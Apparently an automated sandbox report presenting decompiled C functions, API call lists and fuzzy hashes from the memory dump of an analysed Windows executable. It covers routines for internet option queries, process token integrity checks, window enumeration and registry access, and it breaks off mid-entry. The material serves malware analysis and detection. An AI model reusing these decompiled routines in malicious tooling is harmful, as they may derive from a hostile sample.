CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,00000002), ref: 0041817C
GetFileSizeEx.KERNEL32(00000000,?), ref: 0041818F
CloseHandle.KERNEL32(00000000), ref: 004181A2
CloseHandle.KERNEL32(00000000), ref: 004181BA

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 26f61d1130ad3ae2372c5212903980dfa669dcbe708a56123cc2ebc63315b31e
Instruction ID: b833d8339958935815280c0238fc3e6f93ace4467e4aa781b361aa0eaa75c7d4
Opcode Fuzzy Hash: 26f61d1130ad3ae2372c5212903980dfa669dcbe708a56123cc2ebc63315b31e
Instruction Fuzzy Hash: BAF022367012102BE2106A2D9C49BDB3B58EBC5331F680329FE30F22E0D778680A81B9

Uniqueness

Uniqueness Score: -1.00%

Function 00413040, Relevance: 6.0, APIs: 4, Instructions: 44
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413040(void* __eax) {
				void _v4;
				long _v8;
				void _v24;
				long _v28;
				int _t10;
				void* _t11;
				int _t12;
				void* _t19;

				_t19 = __eax;
				_v8 = 4;
				_t10 = InternetQueryOptionA(__eax, 0x15,  &_v4,  &_v8);
				_t11 = InternetCloseHandle(_t19);
				if(_t10 != 0) {
					while(1) {
						_t11 = _v24;
						if(_t11 == 0) {
							goto L3;
						}
						_v28 = 4;
						_t12 = InternetQueryOptionA(_t11, 0x15,  &_v24,  &_v28);
						_t11 = InternetCloseHandle(_t11);
						if(_t12 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t11;
			}

0x0041304d
0x0041305c
0x00413064
0x0041306f
0x00413073
0x00413075
0x00413075
0x0041307b
0x00000000
0x00000000
0x0041308c
0x00413094
0x00413099
0x0041309d
0x00000000
0x00000000
0x00000000
0x0041309d
0x00413075
0x004130a6
0x004130a6

APIs

InternetQueryOptionA.WININET ref: 00413064
InternetCloseHandle.WININET(00000000), ref: 0041306F
InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00413094
InternetCloseHandle.WININET(?), ref: 00413099

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandleOptionQuery
String ID:
API String ID: 4229253161-0
Opcode ID: a1df293b954982b1c2aa5e8e9e1713b66d25193849ca8528a1d138e987eff000
Instruction ID: 43d6733dac4b716c215c705d812156ee80785974a0e72e85a829a4eb1c2771d6
Opcode Fuzzy Hash: a1df293b954982b1c2aa5e8e9e1713b66d25193849ca8528a1d138e987eff000
Instruction Fuzzy Hash: 87F03172100305ABD310DBA9DC49AD7B7ECABCC795F05062EB64893251EB75D90887B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3B0, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C3B0(intOrPtr __eax) {
				char _v64;
				char* _v68;
				char _v84;
				intOrPtr _v88;
				char _v100;
				struct HWND__* _t11;
				RECT* _t15;
				struct HWND__* _t19;

				_v68 =  &_v64;
				_t15 = __eax + 0x24;
				_v88 = __eax;
				FillRect( *(E00410820( &_v84, _t15, 0x10) + 0x154), _t15, 2);
				_t11 = GetTopWindow(0);
				if(_t11 != 0) {
					_t11 = GetWindow(_t11, 1);
					_t19 = _t11;
					if(_t19 != 0) {
						while(1) {
							_t11 = E0041C2B0(_t19,  &_v100);
							if(_t11 == 0) {
								goto L5;
							}
							_t11 = GetWindow(_t19, 3);
							_t19 = _t11;
							if(_t19 != 0) {
								continue;
							}
							goto L5;
						}
					}
				}
				L5:
				return _t11;
			}

0x0041c3bb
0x0041c3bf
0x0041c3c8
0x0041c3db
0x0041c3e3
0x0041c3eb
0x0041c3f6
0x0041c3f8
0x0041c3fc
0x0041c400
0x0041c406
0x0041c40d
0x00000000
0x00000000
0x0041c412
0x0041c414
0x0041c418
0x00000000
0x00000000
0x00000000
0x0041c418
0x0041c400
0x0041c3fc
0x0041c41f
0x0041c41f

APIs

FillRect.USER32 ref: 0041C3DB
GetTopWindow.USER32(00000000), ref: 0041C3E3
GetWindow.USER32(00000000,00000001), ref: 0041C3F6

Part of subcall function 0041C2B0: GetWindowInfo.USER32 ref: 0041C2CF
Part of subcall function 0041C2B0: IntersectRect.USER32 ref: 0041C311
Part of subcall function 0041C2B0: IsRectEmpty.USER32(?), ref: 0041C323
Part of subcall function 0041C2B0: IntersectRect.USER32 ref: 0041C33A
Part of subcall function 0041C2B0: GetTopWindow.USER32 ref: 0041C361
Part of subcall function 0041C2B0: GetWindow.USER32(00000000,00000001), ref: 0041C374
Part of subcall function 0041C2B0: GetWindow.USER32(00000000,00000003), ref: 0041C392

GetWindow.USER32(00000000,00000003), ref: 0041C412

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Intersect$EmptyFillInfo
String ID:
API String ID: 3909057745-0
Opcode ID: 8c6bbd1d7fd0c750f2c51c9727c8340233956347564c78b67962693836a6d189
Instruction ID: 68686ac60d12d863a0c05e333b7fa7932fcea1bdf30774ddc77992e3fb0da26c
Opcode Fuzzy Hash: 8c6bbd1d7fd0c750f2c51c9727c8340233956347564c78b67962693836a6d189
Instruction Fuzzy Hash: 9DF0993254431017C320AB248CA1FEB73E8AFC4B40F04422EF945AB2A1DA78D94586C8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F809, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F809(int __eax, void* __edi, int __esi, short _a8, char _a446) {
				short _v0;
				int _t16;
				signed int _t17;
				WCHAR* _t19;
				void* _t29;
				int _t31;
				void* _t34;

				_t31 = __esi;
				_t29 = __edi;
				_t16 = __eax;
				do {
					_t16 = _t16 + 1;
				} while ( *((char*)(_t34 + _t16 + 0x1be)) != 0);
				_t17 = MultiByteToWideChar(0, 0,  &_a446, _t16,  &_a8, 0x14);
				if(_t17 >= 0x14) {
					_t17 = 0;
				}
				 *((short*)(_t34 + 8 + _t17 * 2)) = 0;
				if(_t29 <= _t31) {
					L10:
					return 0;
				} else {
					_t19 =  *0x42e954;
					if(_t19[_t31] != 0x5c || StrCmpNIW(0x42e958, _t19, _t31) != 0 || lstrcmpiW( &_v0,  *0x42e954 + 2 + _t31 * 2) != 0) {
						goto L10;
					} else {
						return 1;
					}
				}
			}

0x0040f809
0x0040f809
0x0040f809
0x0040f810
0x0040f810
0x0040f811
0x0040f82f
0x0040f838
0x0040f83a
0x0040f83a
0x0040f840
0x0040f846
0x0040f889
0x0040f892
0x0040f848
0x0040f848
0x0040f852
0x00000000
0x0040f87f
0x0040f888
0x0040f888
0x0040f852

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875

Strings

u5VPhXB, xrefs: 0040F852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidelstrcmpi
String ID: u5VPhXB
API String ID: 1977948566-1119068662
Opcode ID: 3455d5a78d19cf3a9b380e0cf3d96d5a23bb97dc4dd779f7b2cf7ae03726b13b
Instruction ID: bde1cfaaea6fc7d46d2153390d9bb73caba14f2f682869d10616ebdf7db0d017
Opcode Fuzzy Hash: 3455d5a78d19cf3a9b380e0cf3d96d5a23bb97dc4dd779f7b2cf7ae03726b13b
Instruction Fuzzy Hash: BD01F732204301AAE338AB65ED45FEB3798AB84740F80843EE046E3190E734D489879A

Uniqueness

Uniqueness Score: -1.00%

Function 004128C0, Relevance: 6.0, APIs: 4, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004128C0(void* __ebx, void* __ecx) {
				long _v4;
				void* _v8;
				void* __edi;
				long _t12;
				void* _t22;

				_t22 = 0;
				if(OpenProcessToken(__ecx, 8,  &_v8) != 0) {
					_t22 = E00415650(_v8);
					if(_t22 != 0 && __ebx != 0) {
						_t12 = GetTokenInformation(_v8, 0xc, __ebx, 4,  &_v4);
						if(_t12 == 0) {
							HeapFree( *0x42e6d4, _t12, _t22);
							_t22 = 0;
						}
					}
					CloseHandle(_v8);
				}
				return _t22;
			}

0x004128cc
0x004128d6
0x004128e2
0x004128e7
0x004128fc
0x00412904
0x0041290f
0x00412915
0x00412915
0x00412904
0x0041291c
0x0041291c
0x00412928

APIs

OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000,?,00000000), ref: 004128CE

Part of subcall function 00415650: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,0042E908,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 00415665
Part of subcall function 00415650: GetLastError.KERNEL32(?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041566B
Part of subcall function 00415650: HeapAlloc.KERNEL32(?,00000008,-00000004,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 0041568B
Part of subcall function 00415650: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,004128E2,?,?,00000008,00000000,00000000,?,00000000), ref: 004156A5

GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),0042E908,00000004,00000000,?,00000008,00000000,00000000,?,00000000), ref: 004128FC
HeapFree.KERNEL32(?,00000000,00000000,?,00000008,00000000,00000000,?,00000000), ref: 0041290F
CloseHandle.KERNEL32(00000000,?,00000008,00000000,00000000,?,00000000), ref: 0041291C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Heap$AllocCloseErrorFreeHandleLastOpenProcess
String ID:
API String ID: 3241878457-0
Opcode ID: 7c2fcd383ed786dad00b2f59500d717a169467dc67d43afa790202ebf91f9168
Instruction ID: 5ac835cd5c8dcb5d2861f054db74567fc53a2576f5b5cca1d552b430de00a064
Opcode Fuzzy Hash: 7c2fcd383ed786dad00b2f59500d717a169467dc67d43afa790202ebf91f9168
Instruction Fuzzy Hash: 6AF022B27002127BD6209B69DE44EEB77ACEF84B50F408529FA44E7220D774CC4087E8

Uniqueness

Uniqueness Score: -1.00%

Function 004136E0, Relevance: 6.0, APIs: 4, Instructions: 41
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004136E0(void* __ebx, DWORD* __esi) {
				int _t1;
				long _t4;
				int _t8;
				void* _t9;
				void* _t12;

				 *__esi = 0;
				_t1 = InternetQueryOptionA(__ebx, 0x22, 0, __esi);
				if(_t1 != 0 ||  *__esi <= _t1 || GetLastError() != 0x7a) {
					L7:
					return 0;
				}
				_t4 =  *__esi;
				if(_t4 == 0) {
					goto L7;
				}
				_t12 = HeapAlloc( *0x42e6d4, 8, _t4 + 4);
				if(_t12 == 0) {
					goto L7;
				}
				_t8 = InternetQueryOptionA(__ebx, 0x22, _t12, __esi);
				_t9 = _t12;
				if(_t8 != 1) {
					E004107C0(_t9);
					goto L7;
				}
				return _t9;
			}

0x004136ee
0x004136f4
0x004136f8
0x0041373a
0x00000000
0x0041373a
0x00413709
0x0041370d
0x00000000
0x00000000
0x00413721
0x00413725
0x00000000
0x00000000
0x0041372c
0x00413731
0x00413733
0x00413735
0x00000000
0x00413735
0x0041373e

APIs

InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 004136F4
GetLastError.KERNEL32(?,00000000,0040B7E5), ref: 004136FE
HeapAlloc.KERNEL32(?,00000008,-00000004,?,00000000,0040B7E5), ref: 0041371B
InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 0041372C

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInternetOptionQuery$AllocErrorFreeLast
String ID:
API String ID: 1362823640-0
Opcode ID: 64dbd50f46b2e7a6cb32dd5b12c952c7d96c569d577891a56da6caf8999b6f32
Instruction ID: a9066eb78fc694f687991784fd4e7ce484e9093c18068aa46ba267515b29f9a9
Opcode Fuzzy Hash: 64dbd50f46b2e7a6cb32dd5b12c952c7d96c569d577891a56da6caf8999b6f32
Instruction Fuzzy Hash: 68F059F060020167E3702FB69E46F57379CEB9074AF50843AF154D23C0DA34DD80862C

Uniqueness

Uniqueness Score: -1.00%

Function 00413740, Relevance: 6.0, APIs: 4, Instructions: 41
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413740(long __ebx, DWORD* __esi, void* _a4) {
				int _t2;
				long _t5;
				int _t9;
				void* _t10;
				void* _t13;
				void* _t15;

				_t15 = _a4;
				 *__esi = 0;
				_t2 = InternetQueryOptionW(_t15, __ebx, 0, __esi);
				if(_t2 != 0 ||  *__esi <= _t2 || GetLastError() != 0x7a) {
					L7:
					return 0;
				}
				_t5 =  *__esi;
				if(_t5 == 0) {
					goto L7;
				}
				_t13 = HeapAlloc( *0x42e6d4, 8, _t5 + 4);
				if(_t13 == 0) {
					goto L7;
				}
				_t9 = InternetQueryOptionW(_t15, __ebx, _t13, __esi);
				_t10 = _t13;
				if(_t9 != 1) {
					E004107C0(_t10);
					goto L7;
				}
				return _t10;
			}

0x00413741
0x0041374b
0x00413751
0x00413759
0x0041379e
0x00000000
0x0041379e
0x0041376a
0x0041376e
0x00000000
0x00000000
0x00413782
0x00413786
0x00000000
0x00000000
0x0041378c
0x00413795
0x00413797
0x00413799
0x00000000
0x00413799
0x004137a2

APIs

InternetQueryOptionW.WININET(?,0000001C,00000000,?), ref: 00413751
GetLastError.KERNEL32 ref: 0041375F
HeapAlloc.KERNEL32(?,00000008,-00000004), ref: 0041377C
InternetQueryOptionW.WININET(?,0000001C,00000000,?), ref: 0041378C

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInternetOptionQuery$AllocErrorFreeLast
String ID:
API String ID: 1362823640-0
Opcode ID: 50520d1dc781a2f6e00be83134013cc3bff76cba4995e220874e78bcdc731355
Instruction ID: 4cb595e8839c555d44bef47eb0ad34d10c8df4a61dde4f9281effdf46f6c2e99
Opcode Fuzzy Hash: 50520d1dc781a2f6e00be83134013cc3bff76cba4995e220874e78bcdc731355
Instruction Fuzzy Hash: 6BF0F6F12002056BD3301F669E8CF977BDDDB9076AF14482AF059D12A0DA34ED80C728

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4E0, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B4E0(intOrPtr _a4, signed int _a12) {
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr _t12;
				intOrPtr* _t14;
				intOrPtr _t18;

				_t8 = _a12;
				if(_t8 == 0x64 || _t8 == 0x33) {
					EnterCriticalSection(0x42d3ec);
					_t18 = _a4;
					if(_t18 == 0) {
						L11:
						LeaveCriticalSection(0x42d3ec);
						return _t8;
					}
					_t12 =  *0x42d408; // 0x0
					_t8 = 0;
					if(_t12 == 0) {
						goto L11;
					}
					_t14 =  *0x42d404; // 0x0
					_t10 = _t14;
					while( *_t10 != _t18) {
						_t8 = _t8 + 1;
						_t10 = _t10 + 0x24;
						if(_t8 < _t12) {
							continue;
						}
						LeaveCriticalSection(0x42d3ec);
						return _t8;
						goto L13;
					}
					if(_t8 != 0xffffffff) {
						_t8 = SetEvent( *(_t14 + 4 + (_t8 + _t8 * 8) * 4));
					}
					goto L11;
				} else {
					return _t8;
				}
				L13:
			}

0x0040b4e0
0x0040b4e7
0x0040b4f4
0x0040b4fa
0x0040b500
0x0040b547
0x0040b54c
0x00000000
0x0040b552
0x0040b502
0x0040b508
0x0040b50c
0x00000000
0x00000000
0x0040b50f
0x0040b515
0x0040b517
0x0040b51b
0x0040b51c
0x0040b521
0x00000000
0x00000000
0x0040b529
0x0040b530
0x00000000
0x0040b530
0x0040b536
0x0040b540
0x0040b540
0x00000000
0x0040b553
0x0040b553
0x0040b553
0x00000000

APIs

EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B4F4
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B529
SetEvent.KERNEL32(?), ref: 0040B540
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B54C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 16f34ae28cb190309f364c70331d826b0186a39a65fc09135f116c9e21ee5b54
Instruction ID: 7b44639ee49241949b2ffe0a4e0887c5d11e925668cafacd68b7d345f15cbd5f
Opcode Fuzzy Hash: 16f34ae28cb190309f364c70331d826b0186a39a65fc09135f116c9e21ee5b54
Instruction Fuzzy Hash: 99F08131600121ABC7259729ED8896F7755EB8572976845BBE402F22B0C739DC82C69D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBE1, Relevance: 6.0, APIs: 4, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBE1(void* __eax, struct HWND__* _a8, struct HRGN__* _a12, long _a16) {
				struct HWND__* _t24;
				char* _t28;

				_t24 = _a8;
				if(__eax + 0x42e94e == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					L7:
					return GetDCEx(_t24, _a12, _a16);
				} else {
					_t28 = TlsGetValue( *0x42eea4);
					if(_t28 == 0 || _t24 !=  *((intOrPtr*)(_t28 + 4))) {
						goto L7;
					} else {
						if((_a16 & 0x000000c0) != 0) {
							DeleteObject(_a12);
						}
						 *_t28 = 1;
						return  *((intOrPtr*)(_t28 + 8));
					}
				}
			}

0x0041bbe9
0x0041bbed
0x0041bc36
0x0041bc49
0x0041bc01
0x0041bc0e
0x0041bc12
0x00000000
0x0041bc19
0x0041bc1e
0x0041bc25
0x0041bc25
0x0041bc2f
0x0041bc33
0x0041bc33
0x0041bc12

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0041BBF7
TlsGetValue.KERNEL32(?), ref: 0041BC08
DeleteObject.GDI32(?), ref: 0041BC25
GetDCEx.USER32(?,?,?), ref: 0041BC41

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$DeleteSingleValueWait
String ID:
API String ID: 3401940004-0
Opcode ID: 1710dac4640b92d3b1631bbd75eb719eab5e02eede1b4b2c76a68bd2dda15a8b
Instruction ID: 7a0925eccd93afe3bbb4e347ce83823c87b895a59ee74a3181e64854f8104467
Opcode Fuzzy Hash: 1710dac4640b92d3b1631bbd75eb719eab5e02eede1b4b2c76a68bd2dda15a8b
Instruction Fuzzy Hash: DFF086722043019BC330DB19EA84AABB7E4EB94710F44492EF58197370D774EC8287A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7B0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041D7B0(void* __ecx, void* __edx) {
				signed char _v740;
				char _v804;
				signed char _v878;
				signed int _v886;
				char _v924;
				char _v932;
				void* __edi;
				signed char _t45;
				void* _t68;
				signed char _t76;

				_push(_t68);
				if(E0041CAF0(__ecx, __edx, _t68, 3) == 0) {
					__eflags = 0;
					return 0;
				} else {
					E0041D610(0);
					if( *0x42eb64 > 1 && E0041A520( &_v924) != 0) {
						if((0x00000001 & _t45) == 0) {
							E004232A0(_t45);
							E0041D150( &_v804);
							if((_v740 & 0x00000008) != 0) {
								"SWhh9@"();
							}
							_t45 = _v878 | 0x00000001;
							_v878 = _t45;
						}
						_t88 = _t45 & 0x00000002;
						if((_t45 & 0x00000002) != 0) {
							E0041F1E0(_t88);
							_t45 = _v878 & 0xfffffffd;
							_v878 = _t45;
						}
						_t90 = _t45 & 0x00000004;
						if((_t45 & 0x00000004) != 0) {
							if(E0041F180( &_v804, _t90) != 0) {
								E004185D0( &_v804);
							}
							_t45 = _v878 & 0xfffffffb;
							_v878 = _t45;
						}
						if((_t45 & 0x00000008) == 0 || (_t45 & 0x00000040) == 0) {
							__imp__CoInitializeEx(0, 2);
							_t76 = _t45;
							if(_t76 == 0 || _t76 == 1 || _t76 == 0x80010106) {
								if((_v886 & 0x00000008) == 0) {
									E004231F0();
									_v886 = _v886 | 0x00000008;
								}
								if((_v886 & 0x00000040) == 0) {
									E00420690();
									_v886 = _v886 | 0x00000040;
								}
								if(_t76 == 0 || _t76 == 1) {
									__imp__CoUninitialize();
								}
							}
						}
						E0041A5C0( &_v932);
					}
					return 1;
				}
			}

0x0041d7be
0x0041d7c8
0x0041d8e9
0x0041d8ef
0x0041d7ce
0x0041d7d0
0x0041d7e0
0x0041d81b
0x0041d81d
0x0041d829
0x0041d836
0x0041d838
0x0041d838
0x0041d841
0x0041d843
0x0041d843
0x0041d847
0x0041d849
0x0041d84b
0x0041d854
0x0041d857
0x0041d857
0x0041d85b
0x0041d85d
0x0041d86d
0x0041d871
0x0041d871
0x0041d87a
0x0041d87d
0x0041d87d
0x0041d883
0x0041d88d
0x0041d893
0x0041d897
0x0041d8aa
0x0041d8ac
0x0041d8b1
0x0041d8b1
0x0041d8bb
0x0041d8bd
0x0041d8c2
0x0041d8c2
0x0041d8c9
0x0041d8cf
0x0041d8cf
0x0041d8c9
0x0041d897
0x0041d8d9
0x0041d8d9
0x0041d8e6
0x0041d8e6

APIs

Part of subcall function 0041D610: WaitForMultipleObjects.KERNEL32(?,0042E7F4,00000001,000000FF), ref: 0041D6A4
Part of subcall function 0041D610: CloseHandle.KERNEL32(?,00000000,00000010), ref: 0041D6CB

Part of subcall function 0041A520: CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
Part of subcall function 0041A520: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
Part of subcall function 0041A520: CloseHandle.KERNEL32(00000000), ref: 0041A58A

CoInitializeEx.OLE32(00000000,00000002,00000003,00000000,00000003), ref: 0041D88D
CoUninitialize.OLE32 ref: 0041D8CF

Part of subcall function 0040B440: HeapFree.KERNEL32(?,00000000,?), ref: 0040B4CA

Part of subcall function 0040B350: SHGetFolderPathW.SHELL32 ref: 0040B392
Part of subcall function 0040B350: PathCombineW.SHLWAPI(?,?,-00000002,00000001,00000004,0040B280,00000000,00000000,00000000,00000000), ref: 0040B3EB

Strings

@, xrefs: 0041D8C2

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandlePathWait$CombineCreateFolderFreeHeapInitializeMultipleMutexObjectObjectsSingleUninitialize
String ID: @
API String ID: 1963761067-2766056989
Opcode ID: 4c621c35ef43b20ee8b642539faefc7732a57e970a2bec60f6cf67d90e0081f7
Instruction ID: 7a169fb76affda86cd1db34d48e03193f22ecfe9b9643f2677bcd27eac0b92e3
Opcode Fuzzy Hash: 4c621c35ef43b20ee8b642539faefc7732a57e970a2bec60f6cf67d90e0081f7
Instruction Fuzzy Hash: 9031F671D0430466DB61BB6988427DB77909F81358F84092FF9E89B2C2DB28D985839F

Uniqueness

Uniqueness Score: -1.00%

Function 0041A440, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041A440(void* __esi, intOrPtr _a4) {
				char _v360;
				char _v492;
				void* _v496;
				char _v500;
				void* _v501;
				void* __ebx;
				void* __edi;
				int _t24;
				void* _t28;
				void* _t30;
				intOrPtr _t33;

				_t30 = __esi;
				_t33 = _a4;
				if( *0x42e720 == 0) {
					E0041D340(0x42e704, 2, 0x42e720);
				}
				_v501 = 0;
				_v496 = 0x80000001;
				_v500 = 0;
				if(RegOpenKeyExW(0x80000001, 0x42e720, 0, 1,  &_v496) != 0) {
					L11:
					return E00410870(_t15, _t33, 0, 0x74);
				}
				_t6 =  &_v500; // 0x42e720
				_t15 = E00416680(0x42e704,  &_v492,  &_v496, _t6);
				if(_t15 == 0xffffffff) {
					goto L11;
				}
				_t10 =  &_v500; // 0x42e720
				_t28 =  *_t10;
				if(_v492 != 3 || _t15 < 0x74) {
					_t24 = _v501;
				} else {
					_push(_t30);
					E00410820(_t33, _t28, 0x74);
					E0041D1B0( &_v500);
					_t15 = E00412640( &_v360, _t33, 0x74);
					_t24 = 1;
				}
				if(_t28 != 0) {
					_t15 = HeapFree( *0x42e6d4, 0, _t28);
				}
				if(_t24 == 0) {
					goto L11;
				}
				return _t15;
			}

0x0041a440
0x0041a448
0x0041a459
0x0041a467
0x0041a467
0x0041a47e
0x0041a482
0x0041a48a
0x0041a496
0x0041a507
0x00000000
0x0041a50c
0x0041a498
0x0041a4ab
0x0041a4b3
0x00000000
0x00000000
0x0041a4ba
0x0041a4ba
0x0041a4be
0x0041a4ec
0x0041a4c5
0x0041a4c5
0x0041a4ca
0x0041a4d3
0x0041a4e2
0x0041a4e7
0x0041a4e9
0x0041a4f2
0x0041a4fd
0x0041a4fd
0x0041a505
0x00000000
0x00000000
0x0041a51a

APIs

RegOpenKeyExW.ADVAPI32 ref: 0041A48E
HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD

Part of subcall function 0041D340: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0041D402
Part of subcall function 0041D340: PathCombineW.SHLWAPI(?,SOFTWARE\Microsoft,0042E704,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D439
Part of subcall function 0041D340: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,0042E704,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?,?), ref: 0041D460

Strings

B, xrefs: 0041A498, 0041A4BA, 0041A49C, 0041A4C8

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$CombineFreeHeapOpenPath
String ID: B
API String ID: 367345653-2386870291
Opcode ID: 5a713a6511f967623ef35da4a5e0ea8751c61ea8cfb49bf1952489cee9351166
Instruction ID: 16aff4a99a6f18c7c42954a7cf5ffdff2c2ef91da18e197bfa23553c72f5a55e
